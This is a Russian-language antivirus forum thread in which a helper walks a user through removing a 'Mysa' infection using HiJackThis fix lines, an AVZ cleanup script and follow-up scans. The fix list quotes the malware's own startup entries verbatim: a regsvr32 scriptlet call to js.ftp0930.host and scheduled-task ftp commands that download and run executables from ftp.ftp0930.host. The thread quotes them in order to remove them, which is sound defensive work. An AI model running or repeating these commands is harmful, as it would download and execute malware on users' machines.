Вирус TODO: <文件说明>, lsmosee, mysa

[SQ]

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('C:\Windows\debug\lsmose.exe');
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('C:\Windows\Temp\conhost.exe','');
 QuarantineFile('C:\Windows\debug\lsmose.exe','');
 QuarantineFile('c:\windows\update.exe','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\debug\item.dat','');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\update.exe','32');
 DeleteFile('C:\Windows\Temp\conhost.exe','32');
 DeleteFile('C:\Windows\debug\lsmose.exe','32');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('a.exe','');
 QuarantineFile('C:\Windows\debug\lsmose.exe','');
 QuarantineFile('c:\windows\temp\conhost.exe','');
 DeleteFile('c:\windows\temp\conhost.exe','32');
 DeleteFile('C:\Windows\debug\lsmose.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteFile('c:\windows\debug\ok.dat','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ загрузите этот архив через данную форму

Пришлите новые логи автологгера, согласно правилам.

[David Goliath]

Те не профиксил, потому что их там больше нет. Скрипт выполнил

CollectionLog-2018.10.31-10.11.zip

[SQ]

В логах вроде все ок, давайте посмотрим, чтобы в загрузчике не было ничего плохого.

1) Покажите лог TDSSKiller
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

Если приложение что-то найдет, то сами самостоятельно не удаляйте.

2) uVS можно работать с неактивной системой, для этого нужно загрузиться с WinPE диска/флэшки, в UVS "Выбрать каталог Windows" - указать на папку Windows на HDD и сделать полный образ автозапуска. https://yadi.sk/d/a1uco1wO3ag9q6- это загрузочная сборка UVS . Стартует с него uVS автоматически.
 

[David Goliath]

Вот. Система работает нормально, второй пункт не стал выполнять. Благодарю за помощь

TDSSKiller.3.1.0.17_31.10.2018_21.16.42_log.txt

[SQ]

Ok, в логах в любом случае ничего вредоносного не видно.

 

Понаблюдайте пару дней, если все будет ок, то выполните завершающие шаги.

 

В завершение:

1.

• Пожалуйста, запустите adwcleaner.exe
• В меню Настройки - Удалить AdwCleaner - выберите Удалить.
• Подтвердите удаление, нажав кнопку: Да.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.

Компьютер перезагрузится.

 

Остальные утилиты лечения и папки можно просто удалить.

 

2.

• Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

[yurik999]

Строгое предупреждение от модератора Mark D. Pearlstone

У вас нет прав оказывать помощь в данном разделе.